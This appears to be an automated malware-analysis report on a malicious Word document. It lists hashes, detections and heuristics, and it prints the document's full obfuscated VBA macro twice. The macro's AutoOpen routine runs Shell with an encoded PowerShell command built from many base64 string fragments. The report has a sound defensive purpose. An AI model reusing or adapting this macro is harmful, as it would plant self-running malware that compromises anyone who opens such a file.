Office (OLE) malware analysis — malicious · 09b8c6fa45ecc2cb

MALICIOUS

Office (OLE)

96.2 KB Created: 2018-06-08 06:16:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 976d91c754d19e03ca59cf16ce251738 SHA-1: ac1992105eb72ac63d96ebfaa3736e1edef751a0 SHA-256: 09b8c6fa45ecc2cbe43521d8d65d6a27226e6978c602dfd894b78908ab982824

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine within the VBA script calls the IwmLQYzjw function, which uses the Shell command to execute a string. This indicates an attempt to download and execute a secondary payload. The ClamAV detection and critical heuristics for Shell calls in VBA further support this assessment.

Heuristics 7

ClamAV: Doc.Malware.Valyria-6884775-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6884775-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Next
IwmLQYzjw = pqzZFaniPu + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKCWaqYuwB) + "owers" + svfBDnAPGfM + nIczik + CtoLjcJqoL + umwMNiNXN + PEKJv + fUNKDmHphqP, 50726 - 50726)
For SzKEp = zozHwc To jfhHh

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12060 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12060 bytes
SHA-256: `a634173f7e9323da9bcda05e24ec0e3c574b83bfb4e3e6abd095f05a32cd623a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FCWHLowuhS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function IwmLQYzjw() On Error Resume Next For iSMzR = YYYoKM To drfmDk For wVsJvX = rLBwV To 29841 uAwOZ = (3309 / CBool(czQEij) - ZZvjoc / Oct(42764 / Hex(24791) / CBtjhN + Rnd(pozOi / Fix(37)))) Next jYdiBU = 47955 - 53461 Next For RrRRl = Sjmwh To tMfSPP For bPjRL = pWCGbC To 76835 zjCRPb = (33140 / CBool(HKQBQ) - MzQlEz / Oct(1401 / Hex(80441) / ZFjvjP + Rnd(Lwtcwd / Fix(37)))) Next BAoIDH = 42413 - 2567 Next IwmLQYzjw = pqzZFaniPu + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKCWaqYuwB) + "owers" + svfBDnAPGfM + nIczik + CtoLjcJqoL + umwMNiNXN + PEKJv + fUNKDmHphqP, 50726 - 50726) For SzKEp = zozHwc To jfhHh For UHotjU = lPqzi To 28649 vQwZK = (70730 / CBool(wFioi) - pUJav / Oct(51178 / Hex(43603) / DiGbkb + Rnd(hzAZj / Fix(37)))) Next PPjIz = 93075 - 57705 Next End Function Sub Autoopen() On Error Resume Next For CJEET = RGQBH To rsmpza For QQHiP = wZEaSw To 58103 KAUBWQ = (3590 / CBool(bhzRrN) - ctKXm / Oct(25208 / Hex(11153) / ipKXzM + Rnd(wDdzjr / Fix(37)))) Next obJHd = 79121 - 49381 Next IwmLQYzjw For zCjCcj = arfEF To LMtCau For wosjfK = jNijQ To 40798 rHozkz = (82390 / CBool(lTblbc) - QFDuq / Oct(67423 / Hex(16672) / CWRcX + Rnd(Mwokq / Fix(37)))) Next EFFpv = 86179 - 38706 Next End Sub Attribute VB_Name = "YEuicVz" Function svfBDnAPGfM() On Error Resume Next For IkKiR = nQKQr To ISJilj For pzisuH = NnoCq To 67518 PuvEX = (68271 / CBool(BwKYuc) - zQhRF / Oct(91292 / Hex(98871) / isPaA + Rnd(zbHZIh / Fix(37)))) Next XNdOzC = 77630 - 6823 Next hdJQzb = "HeLL -e KAAgAG4" + "AZQB3AC0AbwBiAE" + "oAZQBDAFQAIABp" + "AE8ALgBDAG" + "8AbQBQA" + "HIARQBzAFMAS" + "QBvAG4ALgBEA" + "GUAZgBsAGEAdABl" + "AFMAVAByA" + "GUA" For TAiON = HllnL To QDowj For BUCwlv = bCDDF To 86251 AKYPw = (73568 / CBool(cUWnUV) - HKoRQU / Oct(74589 / Hex(67467) / UOiDl + Rnd(DhfuA / Fix(37)))) Next FiZAw = 7990 - 48351 Next VOozGpJ = "YQBNACg" + "AWwBpAG8ALgBNA" + "EUAbQBPAHIAeQ" + "BzAHQAUgBlA" + "EEAbQBdAFs" + "AYwBPAG4AdgBlA" + "FIAdABdAD" + "oAOgBm" + "AHIATw" For fLRZi = sOlpY To RtDAN For sIQpHZ = UBfPR To 37642 NjlJz = (17189 / CBool(Rbpvq) - cuMaY / Oct(75356 / Hex(26667) / QjqDr + Rnd(JSMzU / Fix(37)))) Next IKiIu = 6483 - 8418 Next zHzKtqlnjK = "BNAEIAQQBz" + "AGUANgA0AFMAVA" + "ByAG" + "kAbg" + "BHACgAIAAnAFYAW" + "gB" + "CAH" For ajbtR = tapFq To FEwzuG For EOwOp = UMRMEj To 41476 DkkIwl = (76321 / CBool(jdHJq) - ENiNo / Oct(95281 / Hex(99740) / cRlTwq + Rnd(NkZUvC / Fix(37)))) Next MrzUS = 87629 - 59881 Next mVARHQcU = "QAUwA4AE4A" + "QQBEAE0AZQA" + "vAHkAc" + "gAwAG" + "8AdABN" + "AFAAdAB" + "qAGoAbQB" For HjjEI = iqsYi To ISWdp For iWsiov = lArPT To 60408 QGKEj = (85127 / CBool(YjtjwM) - KuUTiV / Oct(20599 / Hex(17034) / ZsnqWC + Rnd(bYscsB / Fix(37)))) Next RuwOK = 74684 - 98151 Next jowAJR = "mAHMA" + "QQBnACsAbwA0AD" + "QATgB" + "wA" For rjUaG = woKvH To kMvBLV For SIEjBJ = CZiHAW To 56555 AEWww = (31538 / CBool(jihkXX) - zvCoq / Oct(61976 / Hex(85212) / ASRTTW + Rnd(CvlAM / Fix(37)))) Next rfPZj = 76783 - 49062 Next LkChSPa = "GMA" + "cQBtAEMAS" + "ABLADkAWgB0AHQA" + "dAAxADAAdgBYAG" + "kAK" + "wBzAGUAMgBI" svfBDnAPGfM = hdJQzb + VOozGpJ + zHzKtqlnjK + mVARHQcU + jowAJR + LkChSPa End Function Function nIczik() On Error Resume Next For CQlPw = mFLfzj To EDfdw For cflzW = rHPmP To 19582 SSzBfD = (41525 / CBool(UzjFDf) - nbkwj / Oct(61268 / Hex(94527) / QROEGS + Rnd(SwVEN / Fix(37)))) Next GBzZbL = 16042 - 65379 Next CKYSzAoi = "AGYAMwAxAEs" + "AcgA0AEoAcABE" + "ADgAawB2" + "AHoAegBUADcA" + "QQB3AEoA" + "cAArAHoA" + "RQAyAGEAaA" + "BhA" For tSfrU = CSaMVc To kRzPiz For mkwSGj = lXIUo To 15027 XvYOz = (66698 / CBool(dusrR) - RiZLh / Oct(21756 / Hex(4816) / JUNlo + Rnd(RvSsj / Fix(37)))) Next SNVaA = 62266 - 27593 Next iSomXRBSSz = "G0ARQ" + "A2AEIAVQBXA" + "HMA" + "bABEAGIARAB" For IpGao = ICzwm To FwNbLd For UwicA = zGENz To 20504 wmGUN = (74399 / CBool(hGOwVF) - PTztO / Oct(45693 / Hex(44122) / RaNGPr + Rnd(Epwllj / Fix(37)))) Next ssOZj = 54106 - 26048 Next hriNzE = "QAEEANABHAHcA" + "MwBWAFYAbQBmA" + "DgAcwBXAFQAbQB" + "DAG4AUABl" + "AEIAK" + "wBBA" + "EQA" + "UwBDADYAUAB" + "CAFUA" For kGvHhn = UkmiC To jHHXF For CZzjTW = bGipru To 63079 pGLHJM = (99113 / CBool(NzHdz) - lGBbu / Oct(21326 / Hex(20059) / WbklLz + Rnd(uvjVmq / Fix(37)))) Next wPvUC = 6716 - 73412 Next uUbrt = "aAB5ADgAcgBOA" + "GUATAA2AHMAWgAz" + "AGgAaAB" + "PAGkANABsA" + "GcASQBMAEUAaQ" + "ByAGsA" + "YwBIAEsAYwBZAF" + "cANQBPA" + "EoATAB6AEoAOA" + "BRADkAY" nIczik = CKYSzAoi + iSomXRBSSz + hriNzE + uUbrt End Function Function CtoLjcJqoL() On Error Resume Next For LszPVX = QAVXFk To WYABjT For YIKVk = mfaIG To 97069 PsmwcR = (12989 / CBool(jAPlQN) - XTAXTh / Oct(76072 / Hex(70720) / ukNBkZ + Rnd(QGzTi / Fix(37)))) Next EZOMXo = 15363 - 91745 Next mYKTKl = "wBWAHAAagBwA" + "DMATQB2ADQAcg" + "BnAGIAaQ" + "A5AHUANwB" + "mAG" + "wAOQAyAGY" For UzuIGH = fDcHzC To DFuJmw For QtNkPb = GJwcs To 19377 QHcTG = (63857 / CBool(vrXoBi) - GdfVz / Oct(9963 / Hex(7059) / jXqfb + Rnd(udiFs / Fix(37)))) Next nzSpjR = 6640 - 41847 Next jAuPaXUK = "ANABtA" + "EIA" + "WABC" + "AEoAMwBNAHo" For pvOtz = jTHvEM To aEdaG For ANtjJ = XIKpp To 62383 hCqbc = (74792 / CBool(YOKXKn) - bXNMF / Oct(20836 / Hex(1037) / nwMEm + Rnd(qVdSOD / Fix(37)))) Next KjdBnd = 58548 - 74439 Next PZKjGm = "ASAB" + "vAE" + "wAdAB1AHIAMw" + "AvAEkA" + "WQBNAFIAc" + "wBo" + "AEUAcgBk" + "AEE" For WZVrv = zdjVBM To uPXAC For shEvkk = nkKSh To 42489 kamjvi = (10298 / CBool(zitBR) - pNdnaw / Oct(88465 / Hex(42279) / ilGiz + Rnd(SRnfi / Fix(37)))) Next UcoFXc = 39596 - 65476 Next CmlwJSWJHh = "ANABuADEA" + "NgAxA" + "FYAVgAvAHUAdw" + "BnAFcAawBKAF" + "oAWQBXAF" + "cANgBOA" + "DYARAB5AGYAdA" For CiTVw = jfHZo To IIzoA For LjRFW = SUlphC To 40057 nvcDn = (18754 / CBool(qmmjFq) - LUqRX / Oct(39950 / Hex(18041) / EwLjC + Rnd(lrzEEO / Fix(37)))) Next NjuBqH = 40064 - 88873 Next RHLpNiSTA = "BXAGUAcABDAEgA" + "bA" + "BTAE" + "cARQAxAFIAZ" + "QBC" CtoLjcJqoL = mYKTKl + jAuPaXUK + PZKjGm + CmlwJSWJHh + RHLpNiSTA End Function Function umwMNiNXN() On Error Resume Next For YQwDJR = QfAQmq To rGHVFv For cBbozn = PhMoHZ To 46573 kzUUrh = (48160 / CBool(woXBD) - jmPzrw / Oct(29326 / Hex(39148) / MdDAw + Rnd(biRGwV / Fix(37)))) Next BlDHD = 95026 - 55735 Next OwFIBKDzQfh = "AG8AMgA0AGs" + "AQQAvADMAZg" + "BUAE8ALw" + "BYAFgA" + "QgBsADE" + "AbQAvAFkAMABsA" + "FIAdQA" + "4AGsA" For ZmsUw = YIibfQ To IqojbR For JGuGZ = kivjtR To 83413 mrKjz = (23627 / CBool(WifRF) - tuObc / Oct(62145 / Hex(10969) / TrmvWq + Rnd(MwiNYW / Fix(37)))) Next zizbE = 39746 - 75032 Next RZoiWBG = "TwA5AC8AYwBQ" + "AG" + "QAagB1AGUAUAAy" + "AF" + "QASgBzAFAAdgBKA" For PoTFq = hIRllX To zXkdV For KkwEj = XvjbB To 52886 DvcwbR = (98954 / CBool(ipRbn) - DAHPzi / Oct(23860 / Hex(55669) / SknFTo + Rnd(hQKATW / Fix(37)))) Next ZJMWz = 59942 - 89657 Next FIfuKu = "HcAUwA2AE8AdgBi" + "ADI" + "AQwA3AGIARAB" + "3AE4A" + "ZgB" + "TA" + "HgASAB2AFUA" + "cABoAHkAVwBFAD" + "gAUQBoAEwAawB" For ctBUvc = DsYaI To NnMfV For IARmfj = iFkMOz To 85582 IuEztU = (41225 / CBool(RctOL) - VAqbz / Oct(73427 / Hex(59538) / GVnRu + Rnd(SfJdQ / Fix(37)))) Next FtHjc = 23921 - 75011 Next NwqHaRJzii = "HAG8AUwBCAGYA" + "UABiAFgAQ" + "gBjAHoAcAB" + "pADIAcgB6AFQAYw" + "AyAFYAS" + "wA" + "0ADIAOQBjAC" + "8ANAB" umwMNiNXN = OwFIBKDzQfh + RZoiWBG + FIfuKu + NwqHaRJzii End Function Function PEKJv() On Error Resume Next For AKmRRW = kWmzGH To niLcaP For lSQwnF = sKzlzq To 18635 jVzXVi = (18986 / CBool(dJQHF) - UAmXv / Oct(28627 / Hex(85765) / TiRIr + Rnd(nOHRo / Fix(37)))) Next wqcCtK = 53298 - 90209 Next XnYosC = "wAFQALwBI" + "AG8A" + "TQB5AHUA" + "dA" + "BZ" + "AEcAZgBa" + "AHYANgBJAEM" For oXzVSp = zbvuDN To VGNqw For OCzTNb = Xkiknz To 67453 HTmZVp = (29511 / CBool(VtokoH) - jTdLYl / Oct(45329 / Hex(58965) / rLaOz + Rnd(HFiWO / Fix(37)))) Next aRcuzW = 57165 - 49193 Next nWCiPp = "AWgBYAG" + "EAagBxAE4ARwBrA" + "DMAMQByAE4A" + "dQBLAEUAWgBFA" + "G0AdA" + "ArAHgA" + "SQBWAE8AR" + "gBkAFg" + "ANAA5AFMATAB" + "6AE8ASwB0AGsA" For rqQoz = JmKtj To ihKOAi For liFRt = FBBRY To 28261 FiAVKa = (99270 / CBool(wTTciz) - kSjwoS / Oct(76162 / Hex(81588) / YXfrOI + Rnd(lfpjv / Fix(37)))) Next oDaiRn = 29826 - 72592 Next OQNEYMC = "cQBRAG0A" + "bQA2AH" + "IAV" + "QBCAEsAMAB" + "KAE8AbQBMAEIARw" + "A3A" + "DkAYQBLAHYAQwAv" For OKKRjk = abRsO To nuHfpw For zpOACd = YFBzaz To 69104 UhzZk = (23018 / CBool(OSDSs) - famwR / Oct(7231 / Hex(82560) / wJPGI + Rnd(UZRRP / Fix(37)))) Next iZahQ = 27269 - 42356 Next VzLVHvUaYCP = "AFIAY" + "wB0ADcAZgBrAEM" + "ATwBJAGQANQB1A" + "FAAdwBBAD0AJwA" + "gACkALABbAEk" + "AbwAuAGM" + "ATwBNAHAA" + "UgBlA" + "HMAUwBJAE" + "8AbgAuAEM" For avwkkL = fPBJvt To YXiSbK For oAmDfm = AEhDh To 96341 ANiVwH = (79204 / CBool(QHTTv) - CzzmL / Oct(15551 / Hex(74259) / KjFZoi + Rnd(UGOul / Fix(37)))) Next KDziD = 91469 - 56557 Next ovIEkpUl = "ATwBtAFA" + "AcgBFAFMAcwB" + "pAG8ATgBt" + "AG8AZABFAF0AOg" + "A6AEQARQBDAG8A" + "TQBQAHIARQ" + "BT" For ijLrDz = jQWqL To DwPXT For AwAFY = iswAI To 15166 JKfzt = (66368 / CBool(jGkqrE) - RHFiH / Oct(68805 / Hex(70846) / odimhZ + Rnd(HjIOd / Fix(37)))) Next uXAVo = 67938 - 58126 Next FuTOLm = "AFMAKQAgAHwAI" + "ABm" + "AG8AcgB" + "lAGEAQwBoAC0Ab" + "wBiAEoAZQBD" + "AFQAIAB7" For LKNTkM = rSBYbf To CTHBK For zAicbW = jEMSA To 12727 cTQSwN = (39196 / CBool(RGqBW) - VhOnY / Oct(6379 / Hex(89016) / clsNp + Rnd(nFiXV / Fix(37)))) Next ujDoEz = 12564 - 68500 Next JJbAujuOzYB = "ACAAb" + "gBlAH" + "cALQBvAGIASgB" + "lAE" + "MAVAAgAHMAeQBz" + "AHQAZQBtAC4A" + "SQBvAC4AUw" + "B0AFIARQBhA" + "G0AcgBFAEE" + "AZA" For bmZAzO = zibDp To qfajX For cLXSj = cliaib To 93814 bAwSN = (80934 / CBool(QIEvRG) - sYOVZn / Oct(14547 / Hex(46331) / TsZWc + Rnd(XvAGiq / Fix(37)))) Next jHVhjL = 6260 - 37771 Next PcEzMLiki = "BFAFIAKAA" + "kAF8ALABbAFQA" + "RQBY" + "AHQALgBlAG" + "4AYwBPAEQASQ" + "BOAGcAXQA6A" + "DoAYQBTAE" + "MASQ" + "BJACAAKQA" For OUztG = NBJDD To fanTJX For IvLbnB = GzsGvU To 68756 dEXjmK = (65457 / CBool(zbmsAh) - NXnSKb / Oct(7193 / Hex(87396) / rOFOI + Rnd(HiNjw / Fix(37)))) Next walaaw = 27035 - 98684 Next ABLMP = "gAH0AIAB8AE" + "YAbwBSAEUAQQB" + "DA" + "EgALQBPAEI" + "ASgBl" + "AGMAdAAgAHsAJAB" + "fAC4AUgBl" + "AEEARAB0AG8A" For JrZRi = ICYUaL To rYFTq For UEfRkw = wCskf To 80157 LiWfwi = (35959 / CBool(foOWXl) - MUGFTi / Oct(91704 / Hex(57943) / pSNnF + Rnd(opkRz / Fix(37)))) Next BZXMc = 41607 - 48036 Next TfUHKBvFl = "RQ" + "BuAGQAKAApACA" + "AfQApACAAfAAm" + "ACAAKAAgACQ" + "Acw" + "BIAGUATAB" PEKJv = XnYosC + nWCiPp + OQNEYMC + VzLVHvUaYCP + ovIEkpUl + FuTOLm + JJbAujuOzYB + PcEzMLiki + ABLMP + TfUHKBvFl End Function Function fUNKDmHphqP() On Error Resume Next For DOajNq = dZWPQ To zqdRf For VAYlGm = LujtrI To 43674 WasjaO = (74598 / CBool(QOBjE) - juvwb / Oct(7199 / Hex(80980) / cTumid + Rnd(jiGtQa / Fix(37)))) Next lkFii = 79002 - 16663 Next risDmJjUNQ = "sAGkARA" + "BbADEAXQAr" + "ACQAUwBIAEU" + "ATABMAEkAZABbA" + "DEAMwB" + "dACsAJwB4A" + "CcAKQA=" fUNKDmHphqP = risDmJjUNQ End Function

SHA-256: a634173f7e9323da9bcda05e24ec0e3c574b83bfb4e3e6abd095f05a32cd623a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "FCWHLowuhS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IwmLQYzjw()
On Error Resume Next
For iSMzR = YYYoKM To drfmDk
      For wVsJvX = rLBwV To 29841
         uAwOZ = (3309 / CBool(czQEij) - ZZvjoc / Oct(42764 / Hex(24791) / CBtjhN + Rnd(pozOi / Fix(37))))
Next
   jYdiBU = 47955 - 53461
Next
For RrRRl = Sjmwh To tMfSPP
      For bPjRL = pWCGbC To 76835
         zjCRPb = (33140 / CBool(HKQBQ) - MzQlEz / Oct(1401 / Hex(80441) / ZFjvjP + Rnd(Lwtcwd / Fix(37))))
Next
   BAoIDH = 42413 - 2567
Next
IwmLQYzjw = pqzZFaniPu + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKCWaqYuwB) + "owers" + svfBDnAPGfM + nIczik + CtoLjcJqoL + umwMNiNXN + PEKJv + fUNKDmHphqP, 50726 - 50726)
For SzKEp = zozHwc To jfhHh
      For UHotjU = lPqzi To 28649
         vQwZK = (70730 / CBool(wFioi) - pUJav / Oct(51178 / Hex(43603) / DiGbkb + Rnd(hzAZj / Fix(37))))
Next
   PPjIz = 93075 - 57705
Next
End Function
Sub Autoopen()
On Error Resume Next
For CJEET = RGQBH To rsmpza
      For QQHiP = wZEaSw To 58103
         KAUBWQ = (3590 / CBool(bhzRrN) - ctKXm / Oct(25208 / Hex(11153) / ipKXzM + Rnd(wDdzjr / Fix(37))))
Next
   obJHd = 79121 - 49381
Next
IwmLQYzjw
For zCjCcj = arfEF To LMtCau
      For wosjfK = jNijQ To 40798
         rHozkz = (82390 / CBool(lTblbc) - QFDuq / Oct(67423 / Hex(16672) / CWRcX + Rnd(Mwokq / Fix(37))))
Next
   EFFpv = 86179 - 38706
Next
End Sub


Attribute VB_Name = "YEuicVz"
Function svfBDnAPGfM()
On Error Resume Next
For IkKiR = nQKQr To ISJilj
      For pzisuH = NnoCq To 67518
         PuvEX = (68271 / CBool(BwKYuc) - zQhRF / Oct(91292 / Hex(98871) / isPaA + Rnd(zbHZIh / Fix(37))))
Next
   XNdOzC = 77630 - 6823
Next
hdJQzb = "HeLL -e KAAgAG4" + "AZQB3AC0AbwBiAE" + "oAZQBDAFQAIABp" + "AE8ALgBDAG" + "8AbQBQA" + "HIARQBzAFMAS" + "QBvAG4ALgBEA" + "GUAZgBsAGEAdABl" + "AFMAVAByA" + "GUA"
For TAiON = HllnL To QDowj
      For BUCwlv = bCDDF To 86251
         AKYPw = (73568 / CBool(cUWnUV) - HKoRQU / Oct(74589 / Hex(67467) / UOiDl + Rnd(DhfuA / Fix(37))))
Next
   FiZAw = 7990 - 48351
Next
VOozGpJ = "YQBNACg" + "AWwBpAG8ALgBNA" + "EUAbQBPAHIAeQ" + "BzAHQAUgBlA" + "EEAbQBdAFs" + "AYwBPAG4AdgBlA" + "FIAdABdAD" + "oAOgBm" + "AHIATw"
For fLRZi = sOlpY To RtDAN
      For sIQpHZ = UBfPR To 37642
         NjlJz = (17189 / CBool(Rbpvq) - cuMaY / Oct(75356 / Hex(26667) / QjqDr + Rnd(JSMzU / Fix(37))))
Next
   IKiIu = 6483 - 8418
Next
zHzKtqlnjK = "BNAEIAQQBz" + "AGUANgA0AFMAVA" + "ByAG" + "kAbg" + "BHACgAIAAnAFYAW" + "gB" + "CAH"
For ajbtR = tapFq To FEwzuG
      For EOwOp = UMRMEj To 41476
         DkkIwl = (76321 / CBool(jdHJq) - ENiNo / Oct(95281 / Hex(99740) / cRlTwq + Rnd(NkZUvC / Fix(37))))
Next
   MrzUS = 87629 - 59881
Next
mVARHQcU = "QAUwA4AE4A" + "QQBEAE0AZQA" + "vAHkAc" + "gAwAG" + "8AdABN" + "AFAAdAB" + "qAGoAbQB"
For HjjEI = iqsYi To ISWdp
      For iWsiov = lArPT To 60408
         QGKEj = (85127 / CBool(YjtjwM) - KuUTiV / Oct(20599 / Hex(17034) / ZsnqWC + Rnd(bYscsB / Fix(37))))
Next
   RuwOK = 74684 - 98151
Next
jowAJR = "mAHMA" + "QQBnACsAbwA0AD" + "QATgB" + "wA"
For rjUaG = woKvH To kMvBLV
      For SIEjBJ = CZiHAW To 56555
         AEWww = (31538 / CBool(jihkXX) - zvCoq / Oct(61976 / Hex(85212) / ASRTTW + Rnd(CvlAM / Fix(37))))
Next
   rfPZj = 76783 - 49062
Next
LkChSPa = "GMA" + "cQBtAEMAS" + "ABLADkAWgB0AHQA" + "dAAxADAAdgBYAG" + "kAK" + "wBzAGUAMgBI"
svfBDnAPGfM = hdJQzb + VOozGpJ + zHzKtqlnjK + mVARHQcU + jowAJR + LkChSPa
End Function
Function nIczik()
On Error Resume Next
For CQlPw = mFLfzj To EDfdw
      For cflzW = rHPmP To 19582
         SSzBfD = (41525 / CBool(UzjFDf) - nbkwj / Oct(61268 / Hex(94527) / QROEGS + Rnd(SwVEN / Fix(37))))
Next
   GBzZbL = 16042 - 65379
Next
CKYSzAoi = "AGYAMwAxAEs" + "AcgA0AEoAcABE" + "ADgAawB2" + "AHoAegBUADcA" + "QQB3AEoA" + "cAArAHoA" + "RQAyAGEAaA" + "BhA"
For tSfrU = CSaMVc To kRzPiz
      For mkwSGj = lXIUo To 15027
         XvYOz = (66698 / CBool(dusrR) - RiZLh / Oct(21756 / Hex(4816) / JUNlo + Rnd(RvSsj / Fix(37))))
Next
   SNVaA = 62266 - 27593
Next
iSomXRBSSz = "G0ARQ" + "A2AEIAVQBXA" + "HMA" + "bABEAGIARAB"
For IpGao = ICzwm To FwNbLd
      For UwicA = zGENz To 20504
         wmGUN = (74399 / CBool(hGOwVF) - PTztO / Oct(45693 / Hex(44122) / RaNGPr + Rnd(Epwllj / Fix(37))))
Next
   ssOZj = 54106 - 26048
Next
hriNzE = "QAEEANABHAHcA" + "MwBWAFYAbQBmA" + "DgAcwBXAFQAbQB" + "DAG4AUABl" + "AEIAK" + "wBBA" + "EQA" + "UwBDADYAUAB" + "CAFUA"
For kGvHhn = UkmiC To jHHXF
      For CZzjTW = bGipru To 63079
         pGLHJM = (99113 / CBool(NzHdz) - lGBbu / Oct(21326 / Hex(20059) / WbklLz + Rnd(uvjVmq / Fix(37))))
Next
   wPvUC = 6716 - 73412
Next
uUbrt = "aAB5ADgAcgBOA" + "GUATAA2AHMAWgAz" + "AGgAaAB" + "PAGkANABsA" + "GcASQBMAEUAaQ" + "ByAGsA" + "YwBIAEsAYwBZAF" + "cANQBPA" + "EoATAB6AEoAOA" + "BRADkAY"
nIczik = CKYSzAoi + iSomXRBSSz + hriNzE + uUbrt
End Function
Function CtoLjcJqoL()
On Error Resume Next
For LszPVX = QAVXFk To WYABjT
      For YIKVk = mfaIG To 97069
         PsmwcR = (12989 / CBool(jAPlQN) - XTAXTh / Oct(76072 / Hex(70720) / ukNBkZ + Rnd(QGzTi / Fix(37))))
Next
   EZOMXo = 15363 - 91745
Next
mYKTKl = "wBWAHAAagBwA" + "DMATQB2ADQAcg" + "BnAGIAaQ" + "A5AHUANwB" + "mAG" + "wAOQAyAGY"
For UzuIGH = fDcHzC To DFuJmw
      For QtNkPb = GJwcs To 19377
         QHcTG = (63857 / CBool(vrXoBi) - GdfVz / Oct(9963 / Hex(7059) / jXqfb + Rnd(udiFs / Fix(37))))
Next
   nzSpjR = 6640 - 41847
Next
jAuPaXUK = "ANABtA" + "EIA" + "WABC" + "AEoAMwBNAHo"
For pvOtz = jTHvEM To aEdaG
      For ANtjJ = XIKpp To 62383
         hCqbc = (74792 / CBool(YOKXKn) - bXNMF / Oct(20836 / Hex(1037) / nwMEm + Rnd(qVdSOD / Fix(37))))
Next
   KjdBnd = 58548 - 74439
Next
PZKjGm = "ASAB" + "vAE" + "wAdAB1AHIAMw" + "AvAEkA" + "WQBNAFIAc" + "wBo" + "AEUAcgBk" + "AEE"
For WZVrv = zdjVBM To uPXAC
      For shEvkk = nkKSh To 42489
         kamjvi = (10298 / CBool(zitBR) - pNdnaw / Oct(88465 / Hex(42279) / ilGiz + Rnd(SRnfi / Fix(37))))
Next
   UcoFXc = 39596 - 65476
Next
CmlwJSWJHh = "ANABuADEA" + "NgAxA" + "FYAVgAvAHUAdw" + "BnAFcAawBKAF" + "oAWQBXAF" + "cANgBOA" + "DYARAB5AGYAdA"
For CiTVw = jfHZo To IIzoA
      For LjRFW = SUlphC To 40057
         nvcDn = (18754 / CBool(qmmjFq) - LUqRX / Oct(39950 / Hex(18041) / EwLjC + Rnd(lrzEEO / Fix(37))))
Next
   NjuBqH = 40064 - 88873
Next
RHLpNiSTA = "BXAGUAcABDAEgA" + "bA" + "BTAE" + "cARQAxAFIAZ" + "QBC"
CtoLjcJqoL = mYKTKl + jAuPaXUK + PZKjGm + CmlwJSWJHh + RHLpNiSTA
End Function
Function umwMNiNXN()
On Error Resume Next
For YQwDJR = QfAQmq To rGHVFv
      For cBbozn = PhMoHZ To 46573
         kzUUrh = (48160 / CBool(woXBD) - jmPzrw / Oct(29326 / Hex(39148) / MdDAw + Rnd(biRGwV / Fix(37))))
Next
   BlDHD = 95026 - 55735
Next
OwFIBKDzQfh = "AG8AMgA0AGs" + "AQQAvADMAZg" + "BUAE8ALw" + "BYAFgA" + "QgBsADE" + "AbQAvAFkAMABsA" + "FIAdQA" + "4AGsA"
For ZmsUw = YIibfQ To IqojbR
      For JGuGZ = kivjtR To 83413
         mrKjz = (23627 / CBool(WifRF) - tuObc / Oct(62145 / Hex(10969) / TrmvWq + Rnd(MwiNYW / Fix(37))))
Next
   zizbE = 39746 - 75032
Next
RZoiWBG = "TwA5AC8AYwBQ" + "AG" + "QAagB1AGUAUAAy" + "AF" + "QASgBzAFAAdgBKA"
For PoTFq = hIRllX To zXkdV
      For KkwEj = XvjbB To 52886
         DvcwbR = (98954 / CBool(ipRbn) - DAHPzi / Oct(23860 / Hex(55669) / SknFTo + Rnd(hQKATW / Fix(37))))
Next
   ZJMWz = 59942 - 89657
Next
FIfuKu = "HcAUwA2AE8AdgBi" + "ADI" + "AQwA3AGIARAB" + "3AE4A" + "ZgB" + "TA" + "HgASAB2AFUA" + "cABoAHkAVwBFAD" + "gAUQBoAEwAawB"
For ctBUvc = DsYaI To NnMfV
      For IARmfj = iFkMOz To 85582
         IuEztU = (41225 / CBool(RctOL) - VAqbz / Oct(73427 / Hex(59538) / GVnRu + Rnd(SfJdQ / Fix(37))))
Next
   FtHjc = 23921 - 75011
Next
NwqHaRJzii = "HAG8AUwBCAGYA" + "UABiAFgAQ" + "gBjAHoAcAB" + "pADIAcgB6AFQAYw" + "AyAFYAS" + "wA" + "0ADIAOQBjAC" + "8ANAB"
umwMNiNXN = OwFIBKDzQfh + RZoiWBG + FIfuKu + NwqHaRJzii
End Function
Function PEKJv()
On Error Resume Next
For AKmRRW = kWmzGH To niLcaP
      For lSQwnF = sKzlzq To 18635
         jVzXVi = (18986 / CBool(dJQHF) - UAmXv / Oct(28627 / Hex(85765) / TiRIr + Rnd(nOHRo / Fix(37))))
Next
   wqcCtK = 53298 - 90209
Next
